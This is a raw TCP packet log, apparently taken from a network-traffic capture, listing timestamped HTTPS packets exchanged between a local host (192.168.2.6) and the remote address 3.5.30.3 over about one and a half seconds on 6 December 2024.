                                                                                                                      Dec 6, 2024 11:04:40.452173948 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452234030 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.452263117 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.452280045 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.489888906 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.489912033 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.489969969 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.489983082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.490040064 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.545156956 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578406096 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578417063 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578438044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578450918 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578551054 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578551054 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.578572989 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.578625917 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.582129955 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607275009 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607291937 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607336044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607388973 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.607403040 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.607414007 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.629743099 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629765034 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629797935 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629829884 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.629839897 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.629888058 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647061110 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647095919 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647109032 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647140026 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647145033 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647161007 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.647171021 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.647244930 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661426067 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661448002 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661526918 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661526918 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.661537886 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.661604881 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.662429094 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.676990032 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.677010059 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.677283049 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.677293062 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693413973 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693438053 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693487883 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.693495989 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.693561077 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.736219883 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.736226082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775197029 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775221109 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775258064 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775338888 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.775348902 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.775403023 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.787213087 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787244081 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787251949 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787278891 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787317038 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.787327051 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.787345886 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.798268080 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798284054 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798315048 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798340082 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.798347950 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.798388958 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.808474064 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808492899 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808557987 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.808564901 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.808593035 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.818260908 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818324089 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818352938 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.818361044 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.818392038 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.824788094 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824839115 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824861050 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.824868917 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.824908018 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831505060 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831556082 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831588030 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831590891 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831603050 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.831640959 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.831640959 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.959556103 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959588051 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959708929 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.959721088 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.959769011 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.960315943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966033936 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966054916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.966162920 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.966171980 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973402977 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973448038 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973483086 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973490000 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.973499060 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.973519087 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.973541975 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.979950905 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.979979038 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980014086 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980031967 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.980037928 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.980057955 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.986135006 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.986155033 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.986201048 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.986208916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.986227989 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.992677927 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992722988 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992769957 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.992778063 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992804050 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.999960899 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.999994040 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000046015 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.000051022 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000062943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000072002 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.000122070 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.149912119 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149936914 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149974108 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149993896 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.150007963 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.150042057 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155378103 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.155396938 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.155519962 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155519962 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155529022 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161890030 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161936998 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161967993 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.161976099 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.162025928 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.162796021 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.162836075 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.168464899 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.168482065 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.168562889 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.168571949 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.168615103 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.169243097 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.175822020 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.175838947 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.175910950 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.175920010 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.182008982 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.182028055 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.182127953 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.182127953 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.182137012 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.188504934 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.188545942 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.188606977 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.188606977 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.188616037 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.195066929 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.195105076 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.195336103 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.195344925 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.247211933 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.247227907 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.295178890 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.344839096 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344851017 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344890118 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344923019 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344930887 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.344938040 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344950914 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.344964981 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.344983101 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.351381063 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.351407051 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.351480007 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.351488113 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.351521015 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.357857943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.357872009 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.357944965 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.357952118 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.364408970 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.364455938 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.364481926 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.364491940 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.364536047 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.371444941 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.371509075 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.371536016 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.371542931 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.371557951 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.371582031 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.371602058 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.378002882 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.378020048 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.378097057 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.378118038 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.378124952 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.378165960 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.384455919 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.384475946 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.384556055 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.384565115 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.438175917 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.438186884 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.486212969 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.534066916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534080029 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534116983 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534132957 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534163952 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534178019 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.534194946 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.534226894 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.539813995 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.539833069 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.539851904 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.539901972 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.539911985 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.539953947 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.540610075 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.540661097 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.546317101 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.546333075 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.546386003 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.546394110 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.546436071 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.547151089 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.552894115 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.552907944 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.552964926 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.552974939 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.560302973 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.560340881 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.560376883 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.560384035 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.560394049 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.560425043 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.560451031 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.566416979 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.566435099 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.566514969 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.566525936 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.566566944 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.567208052 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.572922945 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.572937012 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.573012114 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.573020935 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.580281019 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.580310106 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.580369949 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.580379963 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.580413103 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.580440998 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.728780031 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.728811026 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.728904963 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.728918076 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.729037046 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.729558945 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.736118078 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.736134052 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.736176968 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.736187935 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.736218929 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.742631912 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.742655993 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.742700100 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.742707968 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.742791891 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.743010998 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.743081093 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.749182940 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.749197960 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.749264956 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.749273062 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.749314070 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.749366045 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.755466938 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.755481958 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.755572081 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.755579948 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.762682915 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.762718916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.762799025 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.762809038 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.762878895 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.769211054 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.769224882 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.769274950 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.769304991 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.769346952 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.769351959 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.828479052 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.918777943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.918802977 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.918859959 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.918865919 CET443497183.5.30.3192.168.2.6
